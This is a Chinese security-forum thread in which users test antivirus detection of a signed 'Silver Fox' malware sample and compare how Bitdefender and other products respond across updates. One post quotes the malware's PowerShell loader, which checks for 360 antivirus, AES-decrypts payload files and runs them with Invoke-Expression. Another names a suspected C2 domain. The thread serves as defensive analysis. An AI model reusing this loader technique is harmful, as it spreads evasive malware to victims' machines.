有数字签名的银狐1X

jxfaiu

卡巴现在双击有反应了

时光难逆

经分析，目标调用的系统自带程序在执行恶意命令，应该是不标记原因。

1. "c:\\escsvc\\toolsps.exe" if (Get-Process -Name '360Tray','360sd' -ErrorAction SilentlyContinue) { $AES=New-Object System.Security.Cryptography.AesManaged;$AES.Mode=[System.Security.Cryptography.CipherMode]::CBC;$AES.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$AES.KeySize=256;$AES.BlockSize=128;$Salt=[System.Text.Encoding]::UTF8.GetBytes('Salt1234567890123');$DerivedBytes=New-Object System.Security.Cryptography.Rfc2898DeriveBytes('AdminAAA...',$Salt,1000);$AES.Key=$DerivedBytes.GetBytes(32);$AES.IV=$DerivedBytes.GetBytes(16);$Decryptor=$AES.CreateDecryptor();$EncryptedBytes=[Convert]::FromBase64String((Get-Content -Path 'c:\\escsvc\\4.txt' -Raw -Encoding UTF8));$DecryptedBytes=$Decryptor.TransformFinalBlock($EncryptedBytes,0,$EncryptedBytes.Length);$DecryptedContent=[System.Text.Encoding]::UTF8.GetString($DecryptedBytes);Invoke-Expression $DecryptedContent } else { Start-Process 'c:\\escsvc\\5.exe';$AES=New-Object System.Security.Cryptography.AesManaged;$AES.Mode=[System.Security.Cryptography.CipherMode]::CBC;$AES.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$AES.KeySize=256;$AES.BlockSize=128;$Salt=[System.Text.Encoding]::UTF8.GetBytes('Salt1234567890123');$DerivedBytes=New-Object System.Security.Cryptography.Rfc2898DeriveBytes('AdminAAA...',$Salt,1000);$AES.Key=$DerivedBytes.GetBytes(32);$AES.IV=$DerivedBytes.GetBytes(16);$Decryptor=$AES.CreateDecryptor();$EncryptedBytes=[Convert]::FromBase64String((Get-Content -Path 'c:\\escsvc\\3.txt' -Raw -Encoding UTF8));$DecryptedBytes=$Decryptor.TransformFinalBlock($EncryptedBytes,0,$EncryptedBytes.Length);$DecryptedContent=[System.Text.Encoding]::UTF8.GetString($DecryptedBytes);Invoke-Expression $DecryptedContent }

复制代码

1. "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -File "C:\Users\Root\AppData\Local\Temp\guardian_142e0635.ps1"

复制代码

wowocock

中毒后用火绒木马专杀查杀即可。

Rukia

AMD_Ryzen 发表于 2025-11-11 08:05
BEST 双击miss

观察到疑似C2 地址：y-3.jplong.org

回复有没有说拉黑escsvc.exe

AMD_Ryzen

Rukia 发表于 2025-11-11 16:30
回复有没有说拉黑escsvc.exe

并没有，BD的上报回复是不包含检测信息的，我测试下来也没检测escsvc.exe

你这么一说，我又去重测了一下，结果居然发现更新后BEST的行为又发生变化了，变化过程是这样的：
1.一开始是只添加了云拉黑
2.第二次测试的时候，云拉黑+ATC可以检测安装程序+给toolsps.exe执行的命令（22楼提到的这个）加了3个特征
3.最新更新以后，ATC不检测了，toolsps.exe的命令也不报了，变成云拉黑+拉黑toolsps.exe连接的网址

难道BD推出更新时还搞A/B测试嘛，有点意思，明天再看看BD报法还有没有新变化

AMD_Ryzen

Rukia 发表于 2025-11-11 16:30
回复有没有说拉黑escsvc.exe

刚说完版本号又更新了一个小数点，这次又不一样了：
云拉黑，ATC不触发，但是toolsps.exe的命令又被检测上了，可是toolsps.exe连接的网址又不检测了，这来回排列组合呢

Rukia

AMD_Ryzen 发表于 2025-11-11 18:41
刚说完版本号又更新了一个小数点，这次又不一样了：
云拉黑，ATC不触发，但是toolsps.exe的命令又被检测 ...

https://www.virustotal.com/gui/u ... 1cfe05d3e/detection

https://www.virustotal.com/gui/u ... 122ad9d63?nocache=1

楼上分析结果的是有两个外联域名，BD对其中一个添加了检测。
命令的检测类似这个？
实时防护检测到威胁CMD:Heur.BZC.ZFV.Nioc.1.86B469D6。 未采取任何操作。此项目将由toolsps.exe(c:\escsvc\toolsps.exe)进一步处理。 这是AMSI反恶意软件扫描接口检测。

AMD_Ryzen

Rukia 发表于 2025-11-11 19:23
https://www.virustotal.com/gui/u ... 1cfe05d3e/detection

https://www.virustotal.com/gui/u ... 1 ...

是的，不过我这边运行的时候观察流量，只能看到jplong这个域名，另外一个域名一直没出现过，可能和系统时区地域有关？不过我刚才更新过后，jplong这个VT上检出的域名BEST也不报了，非常奇怪

复测确认了，7.99778这个小版本连之前版本已经拉黑的jplong也不拦截了，感觉应该是BD的更新策略

引领五基生活

fsp kill

biue

腾讯电脑管家 1X